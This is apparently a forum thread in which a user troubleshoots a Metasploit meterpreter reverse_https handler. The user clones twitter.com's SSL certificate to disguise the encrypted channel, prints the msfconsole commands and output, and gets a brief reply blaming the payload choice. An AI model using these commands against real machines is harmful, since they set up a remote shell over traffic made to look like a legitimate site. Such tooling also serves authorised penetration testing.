Hello everyone.
I can’t run meterpreter/reverse_https with an ssl certificate.
make a copy of the certificate:
use auxiliary/gather/impersonate_ssl
set RHOST twitter.com
run
Launch the listener:
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set LHOST IP
set LPORT 8081
set EnableStageEncoding true
set StagerVerifySSLCert true
set HANDLERSSLCERT /root/file.pem
exploit -j
but after the launch I get this:
msf6 exploit(multi/handler) > exploit -j
[] Exploit running as background job 0.
[] Exploit completed, but no session was created.
[*] Started HTTPS reverse handler on https://IP:8081
it should be like this:
msf exploit(handler) > exploit -j
[] Meterpreter will verify SSL Certificate with SHA1 hash 5fefcc6cae228b92002a6d168c5a78d495d8c884
[] Exploit running as background job.
I tried using windows / meterpreter/reverse_winhttps, and everything works fine with it.
Please tell me what my mistake is.
OK - (and again, I’ve never used this exploit so I have no idea about it really) but in general, some boxes respond better to one payload than another.
If you can get it working with windows/meterpreter/reverse_winhttps but not windows/meterpreter/reverse_https then I’d suggest it is down to the payload.